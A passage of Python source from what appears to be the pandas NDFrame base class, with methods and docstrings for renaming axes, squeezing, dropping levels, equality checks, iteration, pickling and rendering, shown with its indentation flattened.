Return index label(s) of the internal NDFrame
"""
# we do it this way because if we have reversed axes, then
# the block manager shows then reversed
return [self._get_axis(a) for a in self._AXIS_ORDERS]
@property
def ndim(self) -> int:
"""
Return an int representing the number of axes / array dimensions.
Return 1 if Series. Otherwise return 2 if DataFrame.
See Also
--------
ndarray.ndim : Number of array dimensions.
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.ndim
1
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.ndim
2
"""
return self._data.ndim
@property
def size(self) -> int:
"""
Return an int representing the number of elements in this object.
Return the number of rows if Series. Otherwise return the number of
rows times number of columns if DataFrame.
See Also
--------
ndarray.size : Number of elements in the array.
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.size
3
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.size
4
"""
return np.prod(self.shape)
@property
def _selected_obj(self: FrameOrSeries) -> FrameOrSeries:
""" internal compat with SelectionMixin """
return self
@property
def _obj_with_exclusions(self: FrameOrSeries) -> FrameOrSeries:
""" internal compat with SelectionMixin """
return self
def set_axis(self, labels, axis: Axis = 0, inplace: bool = False):
"""
Assign desired index to given axis.
Indexes for%(extended_summary_sub)s row labels can be changed by assigning
a list-like or Index.
.. versionchanged:: 0.21.0
The signature is now `labels` and `axis`, consistent with
the rest of pandas API. Previously, the `axis` and `labels`
arguments were respectively the first and second positional
arguments.
Parameters
----------
labels : list-like, Index
The values for the new index.
axis : %(axes_single_arg)s, default 0
The axis to update. The value 0 identifies the rows%(axis_description_sub)s.
inplace : bool, default False
Whether to return a new %(klass)s instance.
Returns
-------
renamed : %(klass)s or None
An object of type %(klass)s if inplace=False, None otherwise.
See Also
--------
%(klass)s.rename_axis : Alter the name of the index%(see_also_sub)s.
"""
if inplace:
setattr(self, self._get_axis_name(axis), labels)
else:
obj = self.copy()
obj.set_axis(labels, axis=axis, inplace=True)
return obj
def _set_axis(self, axis: int, labels: Index) -> None:
labels = ensure_index(labels)
self._data.set_axis(axis, labels)
self._clear_item_cache()
def swapaxes(self: FrameOrSeries, axis1, axis2, copy=True) -> FrameOrSeries:
"""
Interchange axes and swap values axes appropriately.
Returns
-------
y : same as input
"""
i = self._get_axis_number(axis1)
j = self._get_axis_number(axis2)
if i == j:
if copy:
return self.copy()
return self
mapping = {i: j, j: i}
new_axes = (self._get_axis(mapping.get(k, k)) for k in range(self._AXIS_LEN))
new_values = self.values.swapaxes(i, j)
if copy:
new_values = new_values.copy()
return self._constructor(new_values, *new_axes).__finalize__(self)
def droplevel(self: FrameOrSeries, level, axis=0) -> FrameOrSeries:
"""
Return DataFrame with requested index / column level(s) removed.
.. versionadded:: 0.24.0
Parameters
----------
level : int, str, or list-like
If a string is given, must be the name of a level
If list-like, elements must be names or positional indexes
of levels.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis along which the level(s) is removed:
* 0 or 'index': remove level(s) in column.
* 1 or 'columns': remove level(s) in row.
Returns
-------
DataFrame
DataFrame with requested index / column level(s) removed.
Examples
--------
>>> df = pd.DataFrame([
... [1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12]
... ]).set_index([0, 1]).rename_axis(['a', 'b'])
>>> df.columns = pd.MultiIndex.from_tuples([
... ('c', 'e'), ('d', 'f')
... ], names=['level_1', 'level_2'])
>>> df
level_1 c d
level_2 e f
a b
1 2 3 4
5 6 7 8
9 10 11 12
>>> df.droplevel('a')
level_1 c d
level_2 e f
b
2 3 4
6 7 8
10 11 12
>>> df.droplevel('level_2', axis=1)
level_1 c d
a b
1 2 3 4
5 6 7 8
9 10 11 12
"""
labels = self._get_axis(axis)
new_labels = labels.droplevel(level)
result = self.set_axis(new_labels, axis=axis, inplace=False)
return result
def pop(self: FrameOrSeries, item) -> FrameOrSeries:
"""
Return item and drop from frame. Raise KeyError if not found.
Parameters
----------
item : str
Label of column to be popped.
Returns
-------
Series
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=('name', 'class', 'max_speed'))
>>> df
name class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
>>> df.pop('class')
0 bird
1 bird
2 mammal
3 mammal
Name: class, dtype: object
>>> df
name max_speed
0 falcon 389.0
1 parrot 24.0
2 lion 80.5
3 monkey NaN
"""
result = self[item]
del self[item]
try:
result._reset_cacher()
except AttributeError:
pass
return result
def squeeze(self, axis=None):
"""
Squeeze 1 dimensional axis objects into scalars.
Series or DataFrames with a single element are squeezed to a scalar.
DataFrames with a single column or a single row are squeezed to a
Series. Otherwise the object is unchanged.
This method is most useful when you don't know if your
object is a Series or DataFrame, but you do know it has just a single
column. In that case you can safely call `squeeze` to ensure you have a
Series.
Parameters
----------
axis : {0 or 'index', 1 or 'columns', None}, default None
A specific axis to squeeze. By default, all length-1 axes are
squeezed.
Returns
-------
DataFrame, Series, or scalar
The projection after squeezing `axis` or all the axes.
See Also
--------
Series.iloc : Integer-location based indexing for selecting scalars.
DataFrame.iloc : Integer-location based indexing for selecting Series.
Series.to_frame : Inverse of DataFrame.squeeze for a
single-column DataFrame.
Examples
--------
>>> primes = pd.Series([2, 3, 5, 7])
Slicing might produce a Series with a single value:
>>> even_primes = primes[primes % 2 == 0]
>>> even_primes
0 2
dtype: int64
>>> even_primes.squeeze()
2
Squeezing objects with more than one value in every axis does nothing:
>>> odd_primes = primes[primes % 2 == 1]
>>> odd_primes
1 3
2 5
3 7
dtype: int64
>>> odd_primes.squeeze()
1 3
2 5
3 7
dtype: int64
Squeezing is even more effective when used with DataFrames.
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=['a', 'b'])
>>> df
a b
0 1 2
1 3 4
Slicing a single column will produce a DataFrame with the columns
having only one value:
>>> df_a = df[['a']]
>>> df_a
a
0 1
1 3
So the columns can be squeezed down, resulting in a Series:
>>> df_a.squeeze('columns')
0 1
1 3
Name: a, dtype: int64
Slicing a single row from a single column will produce a single
scalar DataFrame:
>>> df_0a = df.loc[df.index < 1, ['a']]
>>> df_0a
a
0 1
Squeezing the rows produces a single scalar Series:
>>> df_0a.squeeze('rows')
a 1
Name: 0, dtype: int64
Squeezing all axes will project directly into a scalar:
>>> df_0a.squeeze()
1
"""
axis = self._AXIS_NAMES if axis is None else (self._get_axis_number(axis),)
return self.iloc[
tuple(
0 if i in axis and len(a) == 1 else slice(None)
for i, a in enumerate(self.axes)
)
]
# ----------------------------------------------------------------------
# Rename
def rename(
self: FrameOrSeries,
mapper: Optional[Renamer] = None,
*,
index: Optional[Renamer] = None,
columns: Optional[Renamer] = None,
axis: Optional[Axis] = None,
copy: bool = True,
inplace: bool = False,
level: Optional[Level] = None,
errors: str = "ignore",
) -> Optional[FrameOrSeries]:
"""
Alter axes input function or functions. Function / dict values must be
unique (1-to-1). Labels not contained in a dict / Series will be left
as-is. Extra labels listed don't throw an error. Alternatively, change
``Series.name`` with a scalar value (Series only).
Parameters
----------
%(axes)s : scalar, list-like, dict-like or function, optional
Scalar or list-like will alter the ``Series.name`` attribute,
and raise on DataFrame.
dict-like or functions are transformations to apply to
that axis' values
copy : bool, default True
Also copy underlying data.
inplace : bool, default False
Whether to return a new %(klass)s. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
errors : {'ignore', 'raise'}, default 'ignore'
If 'raise', raise a `KeyError` when a dict-like `mapper`, `index`,
or `columns` contains labels that are not present in the Index
being transformed.
If 'ignore', existing keys will be renamed and extra keys will be
ignored.
Returns
-------
renamed : %(klass)s (new object)
Raises
------
KeyError
If any of the labels is not found in the selected axis and
"errors='raise'".
See Also
--------
NDFrame.rename_axis
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.rename("my_name") # scalar, changes Series.name
0 1
1 2
2 3
Name: my_name, dtype: int64
>>> s.rename(lambda x: x ** 2) # function, changes labels
0 1
1 2
4 3
dtype: int64
>>> s.rename({1: 3, 2: 5}) # mapping, changes labels
0 1
3 2
5 3
dtype: int64
Since ``DataFrame`` doesn't have a ``.name`` attribute,
only mapping-type arguments are allowed.
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(2)
Traceback (most recent call last):
...
TypeError: 'int' object is not callable
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
>>> df.rename(index=str, columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
>>> df.rename(index=str, columns={"A": "a", "C": "c"})
a B
0 1 4
1 2 5
2 3 6
Using axis-style parameters
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
See the :ref:`user guide <basics.rename>` for more.
"""
if mapper is None and index is None and columns is None:
raise TypeError("must pass an index to rename")
if index is not None or columns is not None:
if axis is not None:
raise TypeError(
"Cannot specify both 'axis' and any of 'index' or 'columns'"
)
elif mapper is not None:
raise TypeError(
"Cannot specify both 'mapper' and any of 'index' or 'columns'"
)
else:
# use the mapper argument
if axis and self._get_axis_number(axis) == 1:
columns = mapper
else:
index = mapper
result = self if inplace else self.copy(deep=copy)
for axis_no, replacements in enumerate((index, columns)):
if replacements is None:
continue
ax = self._get_axis(axis_no)
baxis = self._get_block_manager_axis(axis_no)
f = com.get_rename_function(replacements)
if level is not None:
level = ax._get_level_number(level)
# GH 13473
if not callable(replacements):
indexer = ax.get_indexer_for(replacements)
if errors == "raise" and len(indexer[indexer == -1]):
missing_labels = [
label
for index, label in enumerate(replacements)
if indexer[index] == -1
]
raise KeyError(f"{missing_labels} not found in axis")
result._data = result._data.rename_axis(
f, axis=baxis, copy=copy, level=level
)
result._clear_item_cache()
if inplace:
self._update_inplace(result._data)
return None
else:
return result.__finalize__(self)
@rewrite_axis_style_signature("mapper", [("copy", True), ("inplace", False)])
def rename_axis(self, mapper=lib.no_default, **kwargs):
"""
Set the name of the axis for the index or columns.
Parameters
----------
mapper : scalar, list-like, optional
Value to set the axis name attribute.
index, columns : scalar, list-like, dict-like or function, optional
A scalar, list-like, dict-like or functions transformations to
apply to that axis' values.
Use either ``mapper`` and ``axis`` to
specify the axis to target with ``mapper``, or ``index``
and/or ``columns``.
.. versionchanged:: 0.24.0
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to rename.
copy : bool, default True
Also copy underlying data.
inplace : bool, default False
Modifies the object directly, instead of creating a new Series
or DataFrame.
Returns
-------
Series, DataFrame, or None
The same type as the caller or None if `inplace` is True.
See Also
--------
Series.rename : Alter Series index labels or name.
DataFrame.rename : Alter DataFrame index labels or name.
Index.rename : Set new names on index.
Notes
-----
``DataFrame.rename_axis`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
The first calling convention will only modify the names of
the index and/or the names of the Index object that is the columns.
In this case, the parameter ``copy`` is ignored.
The second calling convention will modify the names of the
the corresponding index if mapper is a list or a scalar.
However, if mapper is dict-like or a function, it will use the
deprecated behavior of modifying the axis *labels*.
We *highly* recommend using keyword arguments to clarify your
intent.
Examples
--------
**Series**
>>> s = pd.Series(["dog", "cat", "monkey"])
>>> s
0 dog
1 cat
2 monkey
dtype: object
>>> s.rename_axis("animal")
animal
0 dog
1 cat
2 monkey
dtype: object
**DataFrame**
>>> df = pd.DataFrame({"num_legs": [4, 4, 2],
... "num_arms": [0, 0, 2]},
... ["dog", "cat", "monkey"])
>>> df
num_legs num_arms
dog 4 0
cat 4 0
monkey 2 2
>>> df = df.rename_axis("animal")
>>> df
num_legs num_arms
animal
dog 4 0
cat 4 0
monkey 2 2
>>> df = df.rename_axis("limbs", axis="columns")
>>> df
limbs num_legs num_arms
animal
dog 4 0
cat 4 0
monkey 2 2
**MultiIndex**
>>> df.index = pd.MultiIndex.from_product([['mammal'],
... ['dog', 'cat', 'monkey']],
... names=['type', 'name'])
>>> df
limbs num_legs num_arms
type name
mammal dog 4 0
cat 4 0
monkey 2 2
>>> df.rename_axis(index={'type': 'class'})
limbs num_legs num_arms
class name
mammal dog 4 0
cat 4 0
monkey 2 2
>>> df.rename_axis(columns=str.upper)
LIMBS num_legs num_arms
type name
mammal dog 4 0
cat 4 0
monkey 2 2
"""
axes, kwargs = self._construct_axes_from_arguments(
(), kwargs, sentinel=lib.no_default
)
copy = kwargs.pop("copy", True)
inplace = kwargs.pop("inplace", False)
axis = kwargs.pop("axis", 0)
if axis is not None:
axis = self._get_axis_number(axis)
if kwargs:
raise TypeError(
"rename_axis() got an unexpected keyword "
f'argument "{list(kwargs.keys())[0]}"'
)
inplace = validate_bool_kwarg(inplace, "inplace")
if mapper is not lib.no_default:
# Use v0.23 behavior if a scalar or list
non_mapper = is_scalar(mapper) or (
is_list_like(mapper) and not is_dict_like(mapper)
)
if non_mapper:
return self._set_axis_name(mapper, axis=axis, inplace=inplace)
else:
raise ValueError("Use `.rename` to alter labels with a mapper.")
else:
# Use new behavior. Means that index and/or columns
# is specified
result = self if inplace else self.copy(deep=copy)
for axis in range(self._AXIS_LEN):
v = axes.get(self._AXIS_NAMES[axis])
if v is lib.no_default:
continue
non_mapper = is_scalar(v) or (is_list_like(v) and not is_dict_like(v))
if non_mapper:
newnames = v
else:
f = com.get_rename_function(v)
curnames = self._get_axis(axis).names
newnames = [f(name) for name in curnames]
result._set_axis_name(newnames, axis=axis, inplace=True)
if not inplace:
return result
def _set_axis_name(self, name, axis=0, inplace=False):
"""
Set the name(s) of the axis.
Parameters
----------
name : str or list of str
Name(s) to set.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to set the label. The value 0 or 'index' specifies index,
and the value 1 or 'columns' specifies columns.
inplace : bool, default False
If `True`, do operation inplace and return None.
.. versionadded:: 0.21.0
Returns
-------
Series, DataFrame, or None
The same type as the caller or `None` if `inplace` is `True`.
See Also
--------
DataFrame.rename : Alter the axis labels of :class:`DataFrame`.
Series.rename : Alter the index labels or set the index name
of :class:`Series`.
Index.rename : Set the name of :class:`Index` or :class:`MultiIndex`.
Examples
--------
>>> df = pd.DataFrame({"num_legs": [4, 4, 2]},
... ["dog", "cat", "monkey"])
>>> df
num_legs
dog 4
cat 4
monkey 2
>>> df._set_axis_name("animal")
num_legs
animal
dog 4
cat 4
monkey 2
>>> df.index = pd.MultiIndex.from_product(
... [["mammal"], ['dog', 'cat', 'monkey']])
>>> df._set_axis_name(["type", "name"])
legs
type name
mammal dog 4
cat 4
monkey 2
"""
axis = self._get_axis_number(axis)
idx = self._get_axis(axis).set_names(name)
inplace = validate_bool_kwarg(inplace, "inplace")
renamed = self if inplace else self.copy()
renamed.set_axis(idx, axis=axis, inplace=True)
if not inplace:
return renamed
# ----------------------------------------------------------------------
# Comparison Methods
def _indexed_same(self, other) -> bool:
return all(
self._get_axis(a).equals(other._get_axis(a)) for a in self._AXIS_ORDERS
)
def equals(self, other):
"""
Test whether two objects contain the same elements.
This function allows two Series or DataFrames to be compared against
each other to see if they have the same shape and elements. NaNs in
the same location are considered equal. The column headers do not
need to have the same type, but the elements within the columns must
be the same dtype.
Parameters
----------
other : Series or DataFrame
The other Series or DataFrame to be compared with the first.
Returns
-------
bool
True if all elements are the same in both objects, False
otherwise.
See Also
--------
Series.eq : Compare two Series objects of the same length
and return a Series where each element is True if the element
in each Series is equal, False otherwise.
DataFrame.eq : Compare two DataFrame objects of the same shape and
return a DataFrame where each element is True if the respective
element in each DataFrame is equal, False otherwise.
testing.assert_series_equal : Raises an AssertionError if left and
right are not equal. Provides an easy interface to ignore
inequality in dtypes, indexes and precision among others.
testing.assert_frame_equal : Like assert_series_equal, but targets
DataFrames.
numpy.array_equal : Return True if two arrays have the same shape
and elements, False otherwise.
Notes
-----
This function requires that the elements have the same dtype as their
respective elements in the other Series or DataFrame. However, the
column labels do not need to have the same type, as long as they are
still considered equal.
Examples
--------
>>> df = pd.DataFrame({1: [10], 2: [20]})
>>> df
1 2
0 10 20
DataFrames df and exactly_equal have the same types and values for
their elements and column labels, which will return True.
>>> exactly_equal = pd.DataFrame({1: [10], 2: [20]})
>>> exactly_equal
1 2
0 10 20
>>> df.equals(exactly_equal)
True
DataFrames df and different_column_type have the same element
types and values, but have different types for the column labels,
which will still return True.
>>> different_column_type = pd.DataFrame({1.0: [10], 2.0: [20]})
>>> different_column_type
1.0 2.0
0 10 20
>>> df.equals(different_column_type)
True
DataFrames df and different_data_type have different types for the
same values for their elements, and will return False even though
their column labels are the same values and types.
>>> different_data_type = pd.DataFrame({1: [10.0], 2: [20.0]})
>>> different_data_type
1 2
0 10.0 20.0
>>> df.equals(different_data_type)
False
"""
if not isinstance(other, self._constructor):
return False
return self._data.equals(other._data)
# -------------------------------------------------------------------------
# Unary Methods
def __neg__(self):
values = com.values_from_object(self)
if is_bool_dtype(values):
arr = operator.inv(values)
elif (
is_numeric_dtype(values)
or is_timedelta64_dtype(values)
or is_object_dtype(values)
):
arr = operator.neg(values)
else:
raise TypeError(f"Unary negative expects numeric dtype, not {values.dtype}")
return self.__array_wrap__(arr)
def __pos__(self):
values = com.values_from_object(self)
if is_bool_dtype(values) or is_period_arraylike(values):
arr = values
elif (
is_numeric_dtype(values)
or is_timedelta64_dtype(values)
or is_object_dtype(values)
):
arr = operator.pos(values)
else:
raise TypeError(f"Unary plus expects numeric dtype, not {values.dtype}")
return self.__array_wrap__(arr)
def __invert__(self):
if not self.size:
# inv fails with 0 len
return self
new_data = self._data.apply(operator.invert)
result = self._constructor(new_data).__finalize__(self)
return result
def __nonzero__(self):
raise ValueError(
f"The truth value of a {type(self).__name__} is ambiguous. "
"Use a.empty, a.bool(), a.item(), a.any() or a.all()."
)
__bool__ = __nonzero__
def bool(self):
"""
Return the bool of a single element PandasObject.
This must be a boolean scalar value, either True or False. Raise a
ValueError if the PandasObject does not have exactly 1 element, or that
element is not boolean
Returns
-------
bool
Same single boolean value converted to bool type.
"""
v = self.squeeze()
if isinstance(v, (bool, np.bool_)):
return bool(v)
elif is_scalar(v):
raise ValueError(
"bool cannot act on a non-boolean single element "
f"{type(self).__name__}"
)
self.__nonzero__()
def __abs__(self: FrameOrSeries) -> FrameOrSeries:
return self.abs()
def __round__(self: FrameOrSeries, decimals: int = 0) -> FrameOrSeries:
return self.round(decimals)
# -------------------------------------------------------------------------
# Label or Level Combination Helpers
#
# A collection of helper methods for DataFrame/Series operations that
# accept a combination of column/index labels and levels. All such
# operations should utilize/extend these methods when possible so that we
# have consistent precedence and validation logic throughout the library.
def _is_level_reference(self, key, axis=0):
"""
Test whether a key is a level reference for a given axis.
To be considered a level reference, `key` must be a string that:
- (axis=0): Matches the name of an index level and does NOT match
a column label.
- (axis=1): Matches the name of a column level and does NOT match
an index label.
Parameters
----------
key : str
Potential level name for the given axis
axis : int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_level : bool
"""
axis = self._get_axis_number(axis)
return (
key is not None
and is_hashable(key)
and key in self.axes[axis].names
and not self._is_label_reference(key, axis=axis)
)
def _is_label_reference(self, key, axis=0) -> bool_t:
"""
Test whether a key is a label reference for a given axis.
To be considered a label reference, `key` must be a string that:
- (axis=0): Matches a column label
- (axis=1): Matches an index label
Parameters
----------
key: str
Potential label name
axis: int, default 0
Axis perpendicular to the axis that labels are associated with
(0 means search for column labels, 1 means search for index labels)
Returns
-------
is_label: bool
"""
axis = self._get_axis_number(axis)
other_axes = (ax for ax in range(self._AXIS_LEN) if ax != axis)
return (
key is not None
and is_hashable(key)
and any(key in self.axes[ax] for ax in other_axes)
)
def _is_label_or_level_reference(self, key: str, axis: int = 0) -> bool_t:
"""
Test whether a key is a label or level reference for a given axis.
To be considered either a label or a level reference, `key` must be a
string that:
- (axis=0): Matches a column label or an index level
- (axis=1): Matches an index label or a column level
Parameters
----------
key: str
Potential label or level name
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
is_label_or_level: bool
"""
return self._is_level_reference(key, axis=axis) or self._is_label_reference(
key, axis=axis
)
def _check_label_or_level_ambiguity(self, key, axis: int = 0) -> None:
"""
Check whether `key` is ambiguous.
By ambiguous, we mean that it matches both a level of the input
`axis` and a label of the other axis.
Parameters
----------
key: str or object
Label or level name.
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns).
Raises
------
ValueError: `key` is ambiguous
"""
axis = self._get_axis_number(axis)
other_axes = (ax for ax in range(self._AXIS_LEN) if ax != axis)
if (
key is not None
and is_hashable(key)
and key in self.axes[axis].names
and any(key in self.axes[ax] for ax in other_axes)
):
# Build an informative and grammatical warning
level_article, level_type = (
("an", "index") if axis == 0 else ("a", "column")
)
label_article, label_type = (
("a", "column") if axis == 0 else ("an", "index")
)
msg = (
f"'{key}' is both {level_article} {level_type} level and "
f"{label_article} {label_type} label, which is ambiguous."
)
raise ValueError(msg)
def _get_label_or_level_values(self, key: str, axis: int = 0) -> np.ndarray:
"""
Return a 1-D array of values associated with `key`, a label or level
from the given `axis`.
Retrieval logic:
- (axis=0): Return column values if `key` matches a column label.
Otherwise return index level values if `key` matches an index
level.
- (axis=1): Return row values if `key` matches an index label.
Otherwise return column level values if 'key' matches a column
level
Parameters
----------
key: str
Label or level name.
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
values: np.ndarray
Raises
------
KeyError
if `key` matches neither a label nor a level
ValueError
if `key` matches multiple labels
FutureWarning
if `key` is ambiguous. This will become an ambiguity error in a
future version
"""
axis = self._get_axis_number(axis)
other_axes = [ax for ax in range(self._AXIS_LEN) if ax != axis]
if self._is_label_reference(key, axis=axis):
self._check_label_or_level_ambiguity(key, axis=axis)
values = self.xs(key, axis=other_axes[0])._values
elif self._is_level_reference(key, axis=axis):
values = self.axes[axis].get_level_values(key)._values
else:
raise KeyError(key)
# Check for duplicates
if values.ndim > 1:
if other_axes and isinstance(self._get_axis(other_axes[0]), MultiIndex):
multi_message = (
"\n"
"For a multi-index, the label must be a "
"tuple with elements corresponding to each level."
)
else:
multi_message = ""
label_axis_name = "column" if axis == 0 else "index"
raise ValueError(
(
f"The {label_axis_name} label '{key}' "
f"is not unique.{multi_message}"
)
)
return values
def _drop_labels_or_levels(self, keys, axis: int = 0):
"""
Drop labels and/or levels for the given `axis`.
For each key in `keys`:
- (axis=0): If key matches a column label then drop the column.
Otherwise if key matches an index level then drop the level.
- (axis=1): If key matches an index label then drop the row.
Otherwise if key matches a column level then drop the level.
Parameters
----------
keys: str or list of str
labels or levels to drop
axis: int, default 0
Axis that levels are associated with (0 for index, 1 for columns)
Returns
-------
dropped: DataFrame
Raises
------
ValueError
if any `keys` match neither a label nor a level
"""
axis = self._get_axis_number(axis)
# Validate keys
keys = com.maybe_make_list(keys)
invalid_keys = [
k for k in keys if not self._is_label_or_level_reference(k, axis=axis)
]
if invalid_keys:
raise ValueError(
(
"The following keys are not valid labels or "
f"levels for axis {axis}: {invalid_keys}"
)
)
# Compute levels and labels to drop
levels_to_drop = [k for k in keys if self._is_level_reference(k, axis=axis)]
labels_to_drop = [k for k in keys if not self._is_level_reference(k, axis=axis)]
# Perform copy upfront and then use inplace operations below.
# This ensures that we always perform exactly one copy.
# ``copy`` and/or ``inplace`` options could be added in the future.
dropped = self.copy()
if axis == 0:
# Handle dropping index levels
if levels_to_drop:
dropped.reset_index(levels_to_drop, drop=True, inplace=True)
# Handle dropping columns labels
if labels_to_drop:
dropped.drop(labels_to_drop, axis=1, inplace=True)
else:
# Handle dropping column levels
if levels_to_drop:
if isinstance(dropped.columns, MultiIndex):
# Drop the specified levels from the MultiIndex
dropped.columns = dropped.columns.droplevel(levels_to_drop)
else:
# Drop the last level of Index by replacing with
# a RangeIndex
dropped.columns = RangeIndex(dropped.columns.size)
# Handle dropping index labels
if labels_to_drop:
dropped.drop(labels_to_drop, axis=0, inplace=True)
return dropped
# ----------------------------------------------------------------------
# Iteration
def __hash__(self):
raise TypeError(
f"{repr(type(self).__name__)} objects are mutable, "
f"thus they cannot be hashed"
)
def __iter__(self):
"""
Iterate over info axis.
Returns
-------
iterator
Info axis as iterator.
"""
return iter(self._info_axis)
# can we get a better explanation of this?
def keys(self):
"""
Get the 'info axis' (see Indexing for more).
This is index for Series, columns for DataFrame.
Returns
-------
Index
Info axis.
"""
return self._info_axis
def items(self):
"""
Iterate over (label, values) on info axis
This is index for Series and columns for DataFrame.
Returns
-------
Generator
"""
for h in self._info_axis:
yield h, self[h]
@Appender(items.__doc__)
def iteritems(self):
return self.items()
def __len__(self) -> int:
"""Returns length of info axis"""
return len(self._info_axis)
def __contains__(self, key) -> bool_t:
"""True if the key is in the info axis"""
return key in self._info_axis
@property
def empty(self) -> bool_t:
"""
Indicator whether DataFrame is empty.
True if DataFrame is entirely empty (no items), meaning any of the
axes are of length 0.
Returns
-------
bool
If DataFrame is empty, return True, if not return False.
See Also
--------
Series.dropna : Return series without null values.
DataFrame.dropna : Return DataFrame with labels on given axis omitted
where (all or any) data are missing.
Notes
-----
If DataFrame contains only NaNs, it is still not considered empty. See
the example below.
Examples
--------
An example of an actual empty DataFrame. Notice the index is empty:
>>> df_empty = pd.DataFrame({'A' : []})
>>> df_empty
Empty DataFrame
Columns: [A]
Index: []
>>> df_empty.empty
True
If we only have NaNs in our DataFrame, it is not considered empty! We
will need to drop the NaNs to make the DataFrame empty:
>>> df = pd.DataFrame({'A' : [np.nan]})
>>> df
A
0 NaN
>>> df.empty
False
>>> df.dropna().empty
True
"""
return any(len(self._get_axis(a)) == 0 for a in self._AXIS_ORDERS)
# ----------------------------------------------------------------------
# Array Interface
# This is also set in IndexOpsMixin
# GH#23114 Ensure ndarray.__op__(DataFrame) returns NotImplemented
__array_priority__ = 1000
def __array__(self, dtype=None) -> np.ndarray:
return com.values_from_object(self)
def __array_wrap__(self, result, context=None):
result = lib.item_from_zerodim(result)
if is_scalar(result):
# e.g. we get here with np.ptp(series)
# ptp also requires the item_from_zerodim
return result
d = self._construct_axes_dict(self._AXIS_ORDERS, copy=False)
return self._constructor(result, **d).__finalize__(self)
# ideally we would define this to avoid the getattr checks, but
# is slower
# @property
# def __array_interface__(self):
# """ provide numpy array interface method """
# values = self.values
# return dict(typestr=values.dtype.str,shape=values.shape,data=values)
# ----------------------------------------------------------------------
# Picklability
def __getstate__(self) -> Dict[str, Any]:
meta = {k: getattr(self, k, None) for k in self._metadata}
return dict(
_data=self._data,
_typ=self._typ,
_metadata=self._metadata,
attrs=self.attrs,
**meta,
)
def __setstate__(self, state):
if isinstance(state, BlockManager):
self._data = state
elif isinstance(state, dict):
typ = state.get("_typ")
if typ is not None:
attrs = state.get("_attrs", {})
object.__setattr__(self, "_attrs", attrs)
# set in the order of internal names
# to avoid definitional recursion
# e.g. say fill_value needing _data to be
# defined
meta = set(self._internal_names + self._metadata)
for k in list(meta):
if k in state:
v = state[k]
object.__setattr__(self, k, v)
for k, v in state.items():
if k not in meta:
object.__setattr__(self, k, v)
else:
raise NotImplementedError("Pre-0.12 pickles are no longer supported")
elif len(state) == 2:
raise NotImplementedError("Pre-0.12 pickles are no longer supported")
self._item_cache = {}
# ----------------------------------------------------------------------
# Rendering Methods
def __repr__(self) -> str:
# string representation based upon iterating over self
# (since, by definition, `PandasContainers` are iterable)
prepr = f"[{",".join(map(pprint_thing, self))}]"
return f"{type(self).__name__}({prepr})"
def _repr_latex_(self):
"""
Returns a LaTeX representation for a particular object.
Mainly for use with nbconvert (jupyter notebook conversion to pdf).
"""
if config.get_option("display.latex.repr"):
return self.to_latex()
else:
return None
def _repr_data_resource_(self):
"""
Not a real Jupyter special repr method, but we use the same
naming convention.
"""
if config.get_option("display.html.table_schema"):
data = self.head(config.get_option("display.max_rows"))
payload = json.loads(
data.to_json(orient="table"), object_pairs_hook=collections.OrderedDict
)
return payload
# ----------------------------------------------------------------------
# I/O Methods
_shared_docs[
"to_markdown"
] = """
Print %(klass)s in Markdown-friendly format.
.. versionadded:: 1.0.0
Parameters
----------
buf : str, Path or StringIO-like, optional, default None
Buffer to write to. If None, the output is returned as a string.
mode : str, optional
Mode in which file is opened.
**kwargs
These parameters will be passed to `tabulate`.
Returns
-------
str
%(klass)s in Markdown-friendly format.
"""
_shared_docs[
"to_excel"
] = """
Write %(klass)s to an Excel sheet.
To write a single %(klass)s to an Excel .xlsx file it is only necessary to
specify a target file name. To write to multiple sheets it is necessary to
create an `ExcelWriter` object with a target file name, and specify a sheet
in the file to write to.
Multiple sheets may be written to by specifying unique `sheet_name`.
With all data written to the file it is necessary to save the changes.
Note that creating an `ExcelWriter` object with a file name that already
exists will result in the contents of the existing file being erased.
Parameters
----------
excel_writer : str or ExcelWriter object
File path or existing ExcelWriter.
sheet_name : str, default 'Sheet1'
Name of sheet which will contain DataFrame.
na_rep : str, default ''
Missing data representation.
float_format : str, optional
Format string for floating point numbers. For example
``float_format="%%.2f"`` will format 0.1234 to 0.12.
columns : sequence or list of str, optional
Columns to write.
header : bool or list of str, default True
Write out the column names. If a list of string is given it is
assumed to be aliases for the column names.
index : bool, default True
Write row names (index).
index_label : str or sequence, optional
Column label for index column(s) if desired. If not specified, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow : int, default 0
Upper left cell row to dump data frame.
startcol : int, default 0
Upper left cell column to dump data frame.
engine : str, optional
Write engine to use, 'openpyxl' or 'xlsxwriter'. You can also set this
